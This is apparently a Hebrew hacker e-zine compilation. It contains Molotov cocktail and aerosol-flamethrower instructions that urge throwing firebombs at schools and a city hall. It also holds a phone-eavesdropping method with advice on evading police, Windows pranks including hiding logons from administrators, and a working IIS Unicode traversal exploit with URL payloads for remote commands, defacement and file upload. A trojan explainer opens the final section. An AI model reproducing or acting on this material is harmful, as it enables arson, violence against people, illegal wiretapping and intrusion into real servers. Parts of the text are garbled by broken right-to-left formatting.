‫?‪<zero33> yeah‬‬
‫‪<|[you]|> here's the new bot. i'm setting up accounts now. he will bild a server for you.‬‬
‫‪msg it this‬‬‫>‪add+protected user <your nick> <your nick's password‬‬
‫‪<zero33> ok‬‬
‫‪:‬הערה‬
‫למבינים בסקריפטינג‪ ...‬כדי לבנות בוט ולא להוריד אחד‪ ...‬כי אז‪ ..‬לא יאמינו לכם‪ ..‬אם אתם‬
‫מורידים אז‬
‫‪ www.mircx.com‬תורידו אחד מהאלה של‬
‫‪...‬תיבחרו אחד מהאמצע כדי שאף אחד לא יזהה‬
‫^‪by ^dak0da‬‬

‫בקבוק תבערה‬
‫‪...(:‬הכי פשוט זאת השיטה הכי פשוטה והכי טובה שיש)‬
‫‪:‬חומרים‬
‫(‪..‬א‪ -‬בקבוק זכוכית‪( ...‬מומלץ של בירה כדי שיהיה מה לשתות לפני‬
‫‪...‬ב‪ -‬מפית נייר פשוטה‬
‫‪...‬ג‪ -‬בקבוק של אלכוהול‬
‫‪...‬ד‪ -‬זריזות‬
‫‪:‬אופן הביצוע‬
‫‪!!!...‬שתו את כל הבירה ואל תנקו את הבקבוק‬
‫(‪...‬אחרי זה שימו הרבה הרבה הרבה אלכוהול בפנים (אפשר עד החצי‪ ..‬הכי טוב‬
‫(‪...‬ומפית נייר‪( ...‬שחלק מהמפית יהיה בחוץ‬
‫‪...‬שרפו את הקצה של המפית‪ ...‬וזרקו את הגפרור‬
‫‪.‬לתוך הבקבוק‬
‫‪...‬החלק היפה‬
‫‪..‬עכשיו זרקו את הבקבוק ממש מהר‬
‫‪:‬ושתיי דברים אולי יקרו‬
‫‪...‬הוא יתפוץ באוויר להרבה הרבה רסיסים מהחום ‪1-‬‬
‫‪...‬הוא ישרוף כל דבר שהוא יגע בוא ‪2-‬‬
‫‪..‬בכל מקרה זה ס‪22‬ה לזרוק את זה בתוך הבית ספר היסודי שלכם‬
‫‪...‬או בבית ספר הנוכחי שלכם‬
‫‪..‬או סתם ליד בניין העיריה‬
‫‪...‬בכל אופן אני סומך עליכם שתהנו‬
‫‪by zebra‬‬

‫איך לבנות לביור‪flame machine‬‬
‫‪“the girl is mine” - micheal jackson‬‬
‫‪ ...‬מה שלומכם ? אצלי הכל טוב‬
‫‪ ...‬השיטה היא ישנה ומוכרת‪ ,‬כתבתי את הטקסט כדי להבהיר כמה נקודות שוב‬
‫‪ :‬חומרים‬
‫‪ ( .‬ספריי ( כמו ביום העצמאות ‪ -‬המזויפים הם הכי טובים ‪1.‬‬
‫מצית ( אפשר קטנה אבל עדיף את המצית הענקית שפעם לפני שהיו תנורים חשמליים השתמשו ‪2.‬‬
‫‪(.‬במטבח ‪ -‬אפשר להשיג בקו‪-‬אופ ( פעם שיחקתי עם זה בסופר והאבטחה בא עלי ‪ -‬להוריד פרופיל‬
‫‪ ): .‬אומץ ‪ -‬אני לא אחרי אם נשרף לחברה שלכם השער ‪3.‬‬
‫‪ ...‬שיטה א ‪ -‬עובדת עם ספריי בלחץ נמוך‬
‫להתחיל להשפריץ ספריי לקרב בעדינות את המצית והכל מתחיל להיות חם ‪ ...‬שרוף ‪ ...‬אש ‪- ...‬‬
‫‪.‬כלומר ברגע זה יש לכם לביור‪ -‬עם לביור זה אפשר לשרוף דשא‪ ,‬שוטר ואפילו את בן‪-‬לאדן השובב‬
‫שיטה ב ‪ -‬עובדת תמיד‬
‫לסיים את הבקבוק ולדאוג שהבקבוק ישפריץ אוויר‪ ,‬לקרב את המצית בשיא הזהירות לאוויר והינה‬
‫יש לכם לביור‪ .‬יש להזהר נורא בשיטה זאת משום שאנשים טועים וחושבים שהאוויר הזה לא יביא‬
‫‪ ): .‬ללהבה גדולה אבל ‪ ...‬תנסו ותראו‬
‫? מה לעשות עם הלבן של הספריי כשהוא על הרצפה‬
‫אפשר להדליק אותו‪ ,‬הוא דליק נורא ‪ .‬אני ממליץ לעשות קו ארוך של ספריי ולהדליק ‪( ...‬בסוף הקו‬
‫‪ ( .‬אפשר להניח כמה נפצים ‪ ...‬או איזה טיל טומהוק (‪ :‬ואז יהיה לכם מצב רוח פ‪33‬ות‬
‫‪by efraim abramov \ old-hacker‬‬

‫‪windows tricks part 1‬‬
‫המדריך הזה יספר לך כיצד תוכל לשנות מלא דברים במערכת הפעלה ה"מהוללת" ‪windows -‬‬
‫באמצעות עורך הרג'יסטרי (רישום המערכת)‪ ,‬וכמו כן גם טיפים וטריקים שונים בנוגע לדברים‬
‫שיכולים לעזור לך בשעה שאתה משתמש במערכת ההפעלה הזאת (שלדעתי שווה לזב‪)...‬‬
‫(לא אין הכוונה לפיצוח סיסמת ‪ windows‬אם חשבת במקרה שהמדריך עוסק בכך‪)...‬‬
‫השקעתי הרבה שעות בכתיבת המדריך הזה ואני מקווה שתהנה ממנו כמו שאני נהניתי לכתוב אותו‪.‬‬
‫חלק מהדברים פה נכתבו למשתמשים מתחילים מאוד וחלק למשתמשים מתקדמים אני מקווה‬
‫שתפיקו ממנו את הרוב‪.‬‬
‫המדריך נכתב מחומר שאספתי מאתרים שונים בנוגע לכך במשך השנים האחרונות וגם מידע אישי‬
‫שלי לכן אל תופתע אם תראה דברים באתרים אחרים שכבר ראית פה‪.‬‬
‫לכל מי שמתכנת בשפות תכנות (לדוגמת ‪ , ) vb‬שינסה להפעיל חלק מהשיטות המוצעות פה דרך‬
‫תוכנית מסוימת שתפעיל את הרג'יסטרי ‪ .‬זה יכול להיות תרגול נחמד בהחלט‪ ,‬מי יודע אולי מתישהו‬
‫אני יכין תוכנית כזאת‪...‬‬
‫אזהרה‪ :‬מדריך זה יכול לפגוע קשות במערכת ההפעלה ו \ או לגרום לפעילות בלתי חוקית‪ ,‬הוא נכתב‬
‫למטרות לימודיות בלבד ולכן אם אתה מתכוון להשתמש בו זה על אחריותך הפרטית בלבד אני לא‬
‫לוקח אחריות לכל דבר שתעשה בשימוש במדריך זה בכל אופן שהוא חוקי או לא חוקי!!‬
‫ידע נדרש‪:‬‬
‫עדיף שתדע להשתמש קצת בעורך הרג'יסטרי שלך (‪ ) regedit.exe‬שנמצא תחת תיקיית ‪ win98‬או‬‫‪ windows‬וניתן להפעלה אם תלחץ על "התחל" = < הפעלה =< ותכתוב ‪ , regedit‬ההפעלה שלו די‬
‫מזכירה את ה"סייר" של המחשב‪ -‬אז תלמד להשתמש גם בו ‪ ,‬דבר פשוט בהחלט‪ .‬וכמו כן גם כדאי‬
‫שיהיה לך ידע כללי בתכנות רק בשביל שתבין בערך מה אתה עושה‪.‬‬
‫כל המידע נכתב למערכת ‪ windows 98/95‬בעברית אך הוא מתאים גם לגרסה האנגלית!‬
‫זכור לגבות \ לזכור כל שינוי שאתה עושה כדי שתוכל להשיב את המצב לקדמותו!‬
‫הכפתור הימני של העכבר באינטרנט אקספלורר‬
‫תגיד ‪ ,‬אתה לא שונא שיש אתרים מעצבנים קרציות שלא נותנים לך ללחוץ על הכפתור הימני של‬
‫העכבר באמצעות סקריפט‪ ,‬ובכן אל תתעצבן‪.‬‬
‫אם אתה מגיע לאתר כזה פשוט עמוד במקום שבו אתה רוצה ללחוץ על הלחצן הימני ולחץ על הכפתור‬
‫שמתחת לכפתור ‪( shift‬כן זה עם הציור של העכבר)‪ .‬איזה יופי ‪ ,‬הלחצן הימני עובד‪.‬‬
‫משתמשים עם עכבר בעל לחצן אמצעי פשוט יכולים להתעלות על הסקריפט באמצעות לחיצה רצופה‬
‫על הלחצן האמצעי ולאחר מכן לחיצה על הלחצן הימני‪.‬‬
‫כמובן שאפשר להתעלם פשוט מהג'אווה באתר באמצעות ‪ intenet explorer‬ע"י‬
‫כלים > אפשרויות אינטרנט > אבטחה > רמה מותאמת אישית‬
‫ושנה שם כך ששום סקריפט ‪ jave‬או ‪ java script‬יפעל‪ ,‬פשוט מאוד‪...‬‬
‫הפסקת הפעלה אוטומטית של ה ‪cd‬‬
‫נכון שה ‪ cd rom‬שלך מפעיל קבצים אוטומטית ? רוצה להפסיק את זה?‬
‫ובכן גש לעורך הרג'יסטרי שלך והכנס לתיקייה הבאה‪:‬‬
‫‪hkey_currect_user\sofware\microsoft\windows\currectversion\policies\explorer‬‬
‫שנה את הערך שנמצא ב ‪ nodrivetypeautorun‬ל ‪:‬‬
‫‪bd 00 00 00‬‬
‫עכשיו הדיסק לא יפעל בצורה אוטומטית (כנראה שתצטרף להפעיל את המחשב מחדש כדי שהשינוי‬

‫יתרחש) ‪ .‬ד"כ לצורך הגיבוי ברוב המערכות המידע ששינית ממנו היה‬
‫‪00 00 00 95‬‬

‫יצירת תצוגה ממוזערת של קבצי ‪bmp‬‬
‫הנה טריק נחמד ולא מזיק במיוחד ‪ .‬נכון ש ‪ icons‬אתה רואה כמו שהם ‪ -‬מה שאתה רואה זה‬
‫האייקון ‪ ,‬אז כך גם אפשר לעשות לקבצי ‪ - bmp‬איך ?‬
‫לך לעורך הרג'יסטרי והכנס ל‪:‬‬
‫‪hkey_currect_root\paint.picture\defaulticon‬‬
‫ושנה את הערך שנמצא ב תווית ‪ default‬ל ‪%1‬‬
‫אישית אני חושב שזה טריק נחמד במיוחד‪.‬‬
‫תפריטי טורבו‬
‫את זה אני בטוח שתאהב‪ ,‬תלחץ על "התחל" ועכשיו על "תוכניות" נגיד‪ ...‬התפריטים עלים במהירות‬
‫איטית ומעצבנת ‪ -‬בוא תהפוך אותם למהירות טורבו ‪:‬‬
‫הכנס לעורך הרג'יסטרי והכנס ל‪:‬‬
‫‪hkey_currect_user\control panel\ desktop‬‬
‫בתוך ‪ desktop‬הכן מפתח ‪ string value‬חדש (ע"י לחיצה על מקש ימני בתוך החלון הימני‬
‫ובחירת ‪ - ) string value‬וכתוב בשם שלו (לא הערך ! ) ‪menushowdelay‬‬
‫בתוכו שים את הערך ‪ 10‬או ערך נמוך מזה (כל ערך שווה למספר מיליוניות השנייה שהמחשב יחכה עד‬
‫שהוא יפתח את התפריט הבא) ע"י לחיצה כפולה על התווית שיצרת‪ ..‬התחל את המחשב ובפעם הבאה‬
‫שתכנס לתפריט הוא יטוס לך‪...‬‬
‫שינוי הכותרת בחלון ‪internet explorer‬‬
‫אם תפעיל את הדפדפן ‪ explorer‬תראה שכתוב בכותרת ‪ microsoft internet explorer‬ניתן‬
‫לשנות זאת ע"י כך ‪:‬‬
‫הכנס לעורך רג'יסטרי בתיקייה ‪:‬‬
‫‪hkey_local_machine\software\microsoft\internet explorer\main‬‬
‫פתח ‪ string value‬חדש וקרא לו בשם ‪ window title‬בתוכו שים את הטקסט אותו אתה רוצה‬
‫שיופיע‪.‬‬
‫לשנות את כפתור "התחל" והאייקון שלו (למתקדמים)‬
‫זה די מסובך למתחילים ‪ ,‬אם אין לך ידע בבסיסים הקסדצימליים אז תלמד קצת כי המדריך הזה‬
‫דורש ידע כזה (ניתן למצוא במדריכים שלי) ‪.‬‬
‫אני חושב שלשנות את הכפתור של "‪ "start‬זה דבר מאוד נחמד‪ .‬יאללה בוא נתחיל‪:‬‬
‫לשנות את הכיתוב‪:‬‬
‫גבה את ‪ explorer.exe‬מתיקיית ‪windows‬‬
‫לאחר שגיבית אותו בתיקייה מסוימת (שאותה תדע למצוא דרך ‪ dos‬אם הוא ילך לך חס וחלילה)‬
‫פתח לו את הצורה באמצעות עורך הקסדצימלי כלשהוא‪ .‬לך לכתובת ‪hex‬‬
‫‪02df0e‬‬
‫שם תראה את זה‪74 00 72 0 61 00 74 00 53 :‬‬
‫שזה אומר ‪( srart‬תרגום לאסקי) וכל ספרת ה ‪ 00‬מציינים רווח בין האותיות (רווח תיאורטי‬
‫במערכת ההפעלה אין רווח בין האותיות!) ‪ .‬שנה את הערכים לאיזה אותיות שאתה רוצה‪( ...‬בהתאם‬
‫להמרת ה ‪ ascii‬לבסיס הקסדצימלי‪.‬‬
‫עובד במערכת אנגלית ‪ ,‬אין לי מושג איך זה בעברית‪...‬‬
‫לשנות את האייקון‪:‬‬
‫גבה את ‪ user.exe‬מתיקיית ‪windows‬‬
‫עכשיו לך לעורך אייקונים כלשהו שיכול לקרוא ‪ exe‬ופתח בו את הקובץ ‪ ,‬שנה אותו למה שתרצה‪.‬‬

‫משהו חשוב גודל האייקון צריך להתאים לגודל המסך ‪ -‬תנסה לשחק עם זה קצת‪...‬‬
‫להעיף מיקומי תוכניות מ "הוספה \ הסרה"‬
‫אתה עושה ‪ uninstall‬למשחק \ תוכנה אבל כנראה שאתה אוטיסט ולא עשית את זה כמו שצריך ‪):‬‬
‫כנקמה על כך (חחח) ‪ windows‬תקעה לך את התווית של זה בלוח הבקרה בתוך הוספה\ הסרה ‪.‬‬
‫רוצה להעיף את זה ? אין בעיה‪...‬‬
‫לך ל‪:‬‬
‫‪hkey_local_machine\software\microsoft\windows\currentversion\uninstall‬‬
‫ומחק כל מיקום לא רצוי‪.‬‬
‫תפריט "שלח אל"‬
‫טוב אני לא מחדש שום דבר‪ ...‬נכון שאתה לוחץ על הלחצן הימני במקום כלשהו יש לך תפריט שנקרא‬
‫"שלח אל" או באנגלית ‪... sendto‬‬
‫בשביל לשנות את המקומות שבפנים למה שבא לך לתיקייה ‪ sendto‬בספריית המערכת ‪windows‬‬
‫ושנה את מה שאתה רוצה ‪ -‬התיקייה יכולה להיות גם מוסתרת‬
‫שינוי שם "סל המחזור"‬
‫רוצה לקרוא לסל המחזור איך שבא לך ‪" -‬פח זבל" ‪" ,‬אח שלי" ומה שאתה רוצה‪...‬‬
‫לך ברג'יסטרי ל‪:‬‬
‫‪}hkey_classes_root\clsid\{645ff040-5081-101b-9f08-00aa002f954e‬‬
‫ושנה את השם שמופיע ב ‪default‬‬
‫מסכי פתיחה \ סגירה של המחשב‬
‫טוב תזהר עם השטות הזאת כי היא הורסת לפעמים את הגרפיקה של ההתחלה‪...‬‬
‫בתיקיית ‪ windows‬שלך ישנם קבצים שאתה יכול לפתוח עם "צייר" ולשנות אותם למה שאתה‬
‫רוצה‪ ...‬אל תשכח לגבות לפני! (הקבצים יכולים להיות גם מוסתרים)‬
‫‪ - logo.sys‬מסך הפתיחה של המחשב‬
‫‪ - logos.sys‬מסך "כעת בטוח לכבות את המחשב"‬
‫‪ - logow.sys‬מסך הכיבוי של המחשב‬
‫צור עותקים לתפריטים מקומיים‬
‫דבר אדיר ‪ ,‬שכל משתמש צריך לדעת ובזה אני סוגר את הטיפים למדריך זה‪ (...‬מה כבר נגמר ?! אבל‬
‫היה כזה נחמד ‪ ...‬אווווו‪).....‬‬
‫צור תיקייה חדשה וקרא לה כך‪:‬‬
‫}‪control panel.{21ec2020-3aea-1069-a2dd-08002b30309d‬‬
‫הופה הופה ! מה אני רואה כאן‪ ...‬היא נראית בדיוק כמו "לוח הבקרה" ‪...‬עשה אתה מה שאתה רוצה‬
‫כעת‪...‬‬
‫אותו דבר ניתן לעשות גם לדברים אחרים כדוגמת ‪:‬‬
‫חיוג לרשת ‪:‬‬
‫}‪dial up net.{992cffa0-f557-101a-88ec-00dd010ccc48‬‬
‫‪:‬מדפסות‬
‫}‪printers.{2227a280-3aea-1069-a2de-08002b30309d‬‬
‫סיכום‪:‬‬
‫במדריך זה למדת כמה טריקים נחמדים למערכת ההפעלה שיכולים לייעל את השימוש שלך בה‪.‬‬
‫כמובן שאם אתה לא יודע איך להשתמש בטריקים הרסת לעצמך את המערכת כמה פעמים ‪):‬‬
‫מקווה שנהנית‬

‫‪zeos‬‬
‫‪windows tricks part 2‬‬
‫‪,‬הממ אני שמח שאתם קוראים את זה‪ ,‬כי זה מדריך עם שטויות בוינדוס להריץ על חברים‬
‫‪.‬שהם מעצבנים אתכם‪ ,‬ליימרים‪ ,‬וכאלה שכיף לעשות להם באסה בלב‬
‫‪.‬כיבוי מהיר‪ ,‬בלי בקשות ובלה בלה ‪1.‬‬
‫‪.‬פשוט פקודה שמכבה את המחשב‬
‫‪c:\windows\rundll.exe user.exe,exitwindowsexec‬‬
‫‪.‬לבטל את אפשרות הכיבוי מתפריט התחלה ‪2.‬‬
‫‪hkey_current_user\software\microsoft\windows\currentversion\policies\explorer‬‬
‫מחפשים‬
‫‪noclose key‬‬
‫אם הוא לא נמצא תיצרו‬
‫ע"י‬
‫(‪new > string value.)name it noclosekey‬‬
‫‪.‬עכשיו‪ ,‬שימו לו ערך ‪ .1‬כאשר ערך ‪ 1‬פעיל אז הוא האפשרות כיבוי מבוטלת‬
‫? רוצים לעשות את זה יותר מהר‬
‫פיתחו קובץ חדש עם סיומת‪reg‬‬
‫‪++‬‬
‫‪regedit4‬‬
‫]‪[hkey_current_user\software\microsoft\windows\currentversion\policies\explorer‬‬
‫”‪"noclose"="1‬‬
‫‪++‬‬
‫‪.‬והפעילו אותו כמובן‬
‫‪.‬למחוק את הטיפים של הוינדוס כדי לחסוך כמה קילו בייטים מסכנים ‪3.‬‬
‫‪hkey_local_machine\software\microsoft\windows\currentversion\explorer\tips‬‬
‫‪.‬פשוט בחרו את הטיפים ומחקו אותם ע"י מקש מחיקה‬
‫למחוק תפריטים מסוימים בתפריט התחל ‪4.‬‬
‫לדוגמה ‪run‬‬
‫הולכים ל‬
‫‪regedit‬‬
‫‪hkey_current_user\software\microsoft\windows\currentversion\policies\explorer‬‬
‫‪new > dword‬‬
‫‪name > norun value > 1‬‬
‫כמו כן‪nofind‬‬
‫‪.‬הלך גם קיצור הדרך להגיע לשם דרך המקשים של המקלדת‬
‫‪.‬כדי להחזיר למצב מה עושים‪ ,‬שמים לדבר החדש שעשיתם ערך ‪ 0‬או מוחקים אותו‬
‫‪ .‬בשביל האקרים)‪ .‬ביטול ההצגה של המתחבר האחרון לרשת בוינדוס נ‪.‬ט ‪5. )5‬‬
‫‪hkey_local_machine\software\microsoft\windowsnt\currentversion\winlogon‬‬
‫‪name > reportbookok value > 1‬‬

‫‪.‬כדי לבטל מוחקים אותו או שמים ערך ‪0‬‬
‫‪.‬זה טוב כדי שהאדמין לא ידע אם אתם התחברתם אחרונים ועשיתם משהו לא טוב ברשת ‪--‬‬
‫‪.‬הממ אני לא בטוח שזה עובד בגיסראות החדשות של נ‪.‬ט‪ 6 .‬אבל תנסו ‪.‬‬
‫‪. .‬ביטול מסך בדיקת סיסמא בהפעלת הוינדוס נ‪.‬ט‬
‫פוצחים קובץ‪reg‬‬
‫‪disable.reg‬‬
‫‪---‬‬‫‪regedit4‬‬
‫]‪[hkey_local_machine\software\microsoft\windows\currentversion\policies\network‬‬
‫‪"disablepwdcaching"=dword:00000001‬‬
‫‪---‬‬‫‪by zeos‬‬
‫תיקונים ‪efraim abramov -‬‬

‫‪wap - wireless application protocol.‬‬
‫? מה במדריך זה‬
‫? ‪ wap‬מהו *‬
‫!! ‪ - wap‬רשימת הפלאפונים על פרוטוקול ה *‬
‫!?? איך אפשר לנצל את זה *‬
‫!! איך להיזהר לא להיתפס *‬
‫!! מושגים קשורים לנושא *‬
‫!! קרדיטים *‬
‫? ‪ wap‬מהו‬
‫=========‬
‫‪ - wireless application protocol.‬הוא ‪ wap‬ראשי התיבות של‬
‫‪.‬הוא בעצם פרוטוקול תקשורת אשר נותן למכשירי פלאפון מידע כמו קו דיגיטלי ולא אנלוגי‬
‫רשת אנלוגית היא רשת פשוטה אשר לא מתוחכמת כמו שהטכנולוגיה עכשיו &‬
‫‪.‬רשת דיגיטלית הרבה יותר מתקדמת ויש בה הרבה יותר ישומים אפשריים &&‬
‫‪.‬משמש מכשיר פלאפון רגילים וגם טרמינלים של רשת פלאפון כלשהי ‪-wap‬ה‬
‫‪.‬הוא גם משמש לישומי אינטרנט אפשריים &&&‬
‫‪ - mmm.‬אמור להיות עליהם לוגו כזה ‪- wap‬כל המכשירים אשר כוללים את ה‬
‫‪.‬ומידע את הלקוח שהמכשיר שלו פועל בפרוטוקול הנ"ל ‪mmm - mobile media mode.‬‬
‫! ‪ - wap‬רשימת הפלאפונים על פרוטוקול ה‬
‫=====================================‬
‫‪ wap :‬הנה רשימה של מכשירים אשר עובדים על‬
‫‪alcatel onetouch‬‬
‫‪benefon q wap+html‬‬
‫‪benefon twin dual sim‬‬
‫‪ericsson r320‬‬
‫‪ericsson r380‬‬
‫‪mitsubishi trium geo wap‬‬
‫‪motorola timeport l7389‬‬
‫‪motorola v2288‬‬
‫(‪motorola talkabout )t2288‬‬
‫‪nokia 6210‬‬
‫‪nokia 6250‬‬
‫‪nokia 7110‬‬
‫‪panasonic gd 93‬‬
‫‪siemens s35i‬‬
‫‪siemens m35i‬‬
‫‪siemens c35i‬‬
‫‪sony cmd-z5‬‬
‫‪.‬והנה רשימה של פלאפונים ממש ממוחשבים כמו מין פלאפון שהוא גם מחשב אישי‬
‫‪ericsson mc218‬‬
‫‪nokia 9110 communicator‬‬
‫‪siemens ic35‬‬
‫? איך אפשר לנצל את זה‬
‫=====================‬
‫‪.‬אפשר לצוטט למכשירים הנ"ל מפלאפון אחר אשר תומך בפרוטוקול‬
‫‪:‬דוגמא‬
‫? ממכשיר אריקסון אפשר לצוטט למספרי טלפון אחרים‪ ,‬מה הבעיה פה‬
‫‪.‬שאתה לא יכול לבחור מספר שאתה רוצה ואתה לא יכול להצטרף לשיחה כצד שלישי‬

‫? איך עושים את זה‬
‫‪:‬אתה לוקח את המכשיר שלך ועושה ככה‬
‫‪904059, menu, yes, 1, rcl, yes, 8300**, yes, 86.‬‬
‫‪.‬במקום שתי הכוכביות אתה יכול שים את כל סדרי הספרות חוץ מ ‪00‬‬
‫‪(.‬אם אני לא טועה) ‪ : rcl, 3, yes‬כדי לצאת מהמצב הזה אתה עושה‬
‫‪.‬אתה תשמע מישהו מדבר אתה לא תוכל לעשות כלום כדי להפריע לו או משהו כזה‬
‫‪'.‬אולי יהיה לך מזל ותשמע שיחה מהנה או שיחה שמועברים בה נתונים אישיים או חסויים וכו‬
‫! איך להיזהר לא להיתפס‬
‫======================‬
‫‪,‬החוק הכי חשוב לא לעשות את זה כל שניה ושניה ואלף חמש מאות פעמים ביום ‪1.‬‬
‫‪.‬פעם בכמה זמן אם משעמם לכם‬
‫‪.‬על תישארו על הקו יותר מחמישים שניות בפעם אחת‪,‬בציתות אחד אני מתכוון ‪2.‬‬
‫‪, u‬אל תדברו בקול על זה שאתם מצותתים וכו' בחוץ כי אם איזה שוטר סמוי ישמע אותכם ‪3.‬‬
‫‪busted.‬‬
‫‪,‬תנסו כמה שיותר לא לעשות את זה מהמכשיר שלכם או ממכשיר של קרוב משפחה ‪4.‬‬
‫‪,‬כי אם עולים עליכם עד שהם ירעענו נתונים ויבואו לקחת את מי שעה את זה‬
‫‪.‬הם לא יגיעו אליך אלא אל מי שעשיתם את זה ממנו‬
‫‪.‬לא להיתפס ‪5.‬‬
‫!!! מושגים קשורים לנושא‬
‫=======================‬
‫‪ )wap(.‬שפת טקסט של רשת אלחוטית במיוחד לפרוטוקול זה ‪wml:‬‬
‫‪.‬שפת טקסט דיגיטלית ‪htm:‬‬
‫‪.‬מערכת טלפונים אשר תוספים לה סרביסס למיניהם ‪televas:‬‬
‫!!! קרדיטים‬
‫===========‬
‫‪.‬קודם כל תודה למשפחתי האהובה שנתנה לי את הסיכוי לכתוב טקסט זה‬
‫‪'.‬אחרי זה אני מודה לאלוהים על כך שנתן לי ידיים‪ ,‬רגליים וכו‬
‫‪.‬חחח סתם סתם‬
‫‪ - phonel0v3r.‬יש פה קרדיט לחבר ותיק שלי‪ ,‬פריקר כבר הרבה זמן‬
‫‪ www.astalavista.com.‬תודה מיוחדת לו על שעזר לי בכתיבת מדריך זה‪ .‬ולאתר‬
‫‪by pirs[i]ng‬‬
‫תיקונים ‪efraim abramov -‬‬

‫פריצה לאתרים בעזרת יוניקוד‬
‫מבוא‬
‫יוניקוד הוא באג שנמצא ב‪ iis 4.0/5.0‬שהם שרתי ה ‪ web‬של ‪ winnt/win2k‬הבאג מאפשר לתוקף‬
‫להפעיל פקודות דוס מרחוק‪.‬‬
‫קצת היסטוריה‬
‫לפני כמה שנים (בתקופה שאני ישבתי ב ‪ bbs‬והורדתי משחקים של ילדים אינפנטילים התגלה ב ‪iis‬‬
‫‪ 3.0‬ונראה לי גם ב ‪ 2.0‬באג שניקרא ‪double dot‬‬
‫הוא נתן לאנשים לראות איזה ספריות שם רוצים פשוט על ידי‬
‫זה שהם רשמו משהו כזה‪:‬‬
‫‪www.someserver.com/..\..‬‬
‫מיקרוסופט שיחררה פאטצ אבל עקפו אותו בקלוט על ידיד זה שתרגמו את ה‬
‫לכתב של הדפדפן ‪..‬‬
‫אתם בתח שואלים למה אני מספר לכם את זה ‪ .‬ובכן למי שלא ידע יוניקוד זה בכלל פורמט לכתיבת‬
‫טקסט ‪ .‬ולמי שעדיין לא מבין יוניקוד הוא גילגול חדש (ושונה קצת) של הדאבל דות שבו מתרגמים‬
‫‪.‬את ה ‪ /‬לתבנית יוניקוד‬
‫‪.‬יוניקוד תומך בשפות שונות זה טיפה מסבך את הניצול של הבאג אבל בזה אני אדון בהמשך‬
‫מציאת שרת ‪iss‬מתאים‬
‫כדי לבדוק אם שרת מסויים הוא‬
‫‪iss4.0/5.0‬‬
‫עליך לעשות טלנט לפורט ‪ 80‬ולרשום שם‬
‫‪head /‬‬
‫ואז ללחוץ פעמיים אנטר אם זה‬
‫‪iss‬‬
‫זה ירשום כזה דבר‬
‫‪http/1.1 501 not supported‬‬
‫‪server: microsoft-iis/4.0‬‬
‫‪date: fri, 16 mar 2001 15:30:36 gmt‬‬
‫‪content-type: text/html‬‬
‫‪content-length: 121‬‬
‫אתם שמים לב ל‬
‫‪iss/4.0‬‬
‫?‬
‫אם לא אז אתם עוורים‬

‫הניצול (‪)exploit‬‬
‫טוב נתחיל עם הניצול הפשוט ואחרי זה נפרק אותו‬
‫אחרי שמצאתה שרת מתאים אתה יכול לפתוח חלון באקספלורייר ולרשום את הדבר הבא‬
‫\‪http://www.servername.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:‬‬
‫טוב‬
‫‪servername‬‬
‫די מסביר את עצמו‬
‫נעבור לדבר הבא‬
‫‪scripts‬‬
‫זאת הספריה שבה השרת מאכסן את ה‬

‫‪cgi‬‬
‫שלו במקום סקריפטס יכולים לבוא הדברים הבאים‬
‫‪sampels‬‬
‫‪cgi-bin‬‬
‫‪_vti _admin‬‬
‫‪_vti _bin‬‬
‫‪msadc‬‬
‫‪..%c1%9c..‬‬
‫זה התרגום של יוניקוד בגלל שני קוד תומך בהרבה שפות יש גם המון תרגומים שונים שיכולים לעבוד‬
‫במקומו‬
‫הינה רשימה קטנה‬
‫‪..%c1%1c..‬‬
‫‪..%c0%9v..‬‬
‫‪..%c0%af..‬‬
‫‪..%c0%qf..‬‬
‫‪..%c1%8s..‬‬
‫‪..%c1%9c..‬‬
‫‪..%c1%pc..‬‬
‫‪/winnt/system32/cmd.exe?/‬‬
‫החלק הזה צריך להיות קבוע הוא מוביל אותך אל קובץ‬
‫‪cmd.exe‬‬
‫שהוא הקובץ שמפעיל קובצי‬
‫‪*.bat and *.cmd‬‬
‫שהם קבצים שמכילים אוסף של פקודות בדוס שאותם‬
‫‪cmd.exe‬‬
‫מריץ אחת אחרי השניה‬
‫**********************************************************‬
‫טיפ‪ :‬למי שרוצה לדעת עוד קצת על זה יכול למצוא ב‬
‫‪blacksun.box.sk‬‬
‫מדריך על‬
‫‪batch programming‬‬
‫***********************************************************‬
‫‪/c‬‬
‫זה אות הכונן שיושב עליו האתר זה עלול להישתנות‬
‫ועכשיו לקטע המעניין‬
‫\‪+dir+c:‬‬
‫זאת בעצם פקודה בדוס שמראה את התוכן של‬
‫\‪c:‬‬
‫ה ‪ +‬משמש להפריד בין פרמטרים שונים במקום רווח‬
‫יש עוד די הרבה פקודות אבל יש שתיים שאני רוצה להיתעכב עליהם‬
‫הראשונה היא‬
‫‪echo‬‬
‫בשימוש נכון הפקודה הזאת יכולה להכניס טקסט לקבצים וליצור קבצים‬
‫‪( :‬אבל כשמנסים לעשות את הדבר הבא (שאמור להכניס טקסט לקובץ‬

http://victim.machine/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+dfaced+>>+
c:\inetpub\wwwroot\default.asp
‫זה לא פועל‬
‫מה שצריך לעשות זה להעתיק בעזרת‬
copy
‫את‬
cmd.exe
‫ל‬
c:\inetpub\scripts
‫ואז יהיה אפשר לעשות את זה על ידי‬
http://www.hackmel.co.il/scripts/cmd.exe?/c+echo+blablabla+>>+c:\test.txt
‫הפקודה השניה שאני רוצה להסביר עליה היא‬
ftp
‫אם אתם רוצים להעלות קובץ אתם צריכים ליצור בעזרת‬
echo
‫קובץ שמכיל את כל הפקודות אפ טי פי שאתם רוצים להשתמש בהם ואז להפעיל את הפקודה‬
www.serv.com//scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ftp+-s+c:\commands.txt
by y0g1-b3ar

‫"המדריך המקיף על ה‪"-‬טרוייני‬
‫‪.‬ועכשיו בואו נתחיל‬
‫טרויינים הם בעצם קבצים שמטרתם לפתוח שרת על המחשב שלכם ולהפעיל שרת זה כל פעם‬
‫‪.‬שמחשבכם עולה‬
‫?איך זה בעצם פועל‬
‫(‪ *.exe‬ברגע שאתה פותח את הקובץ שנשלח אליך (בד"כ‬
‫על פורט מסויים שמתכנת הטרוייני קבע ]‪[server‬נפתח אצלך במחשב שרת‬
‫ואתה בד"כ לא יודע מזה‪ ..‬כי הטרויינים בנויים ככה שלא תדע שאתה נדבקת בהם‬
‫‪..‬למשל‪ ..‬אתה תפתח את הקובץ של הטרוייני ויפעל לך משחק קטנטן ואתה לא תחשוד בכלום‬
‫אבל בעצם באותו זמן יותחל הטרוייני על המחשב‬
‫או שלמשל תקבל הודעת שגיאה כאילו היה בעיה עם הקובץ ובעצם ברגע זה נדבקת בטרוייני אכזרי‬
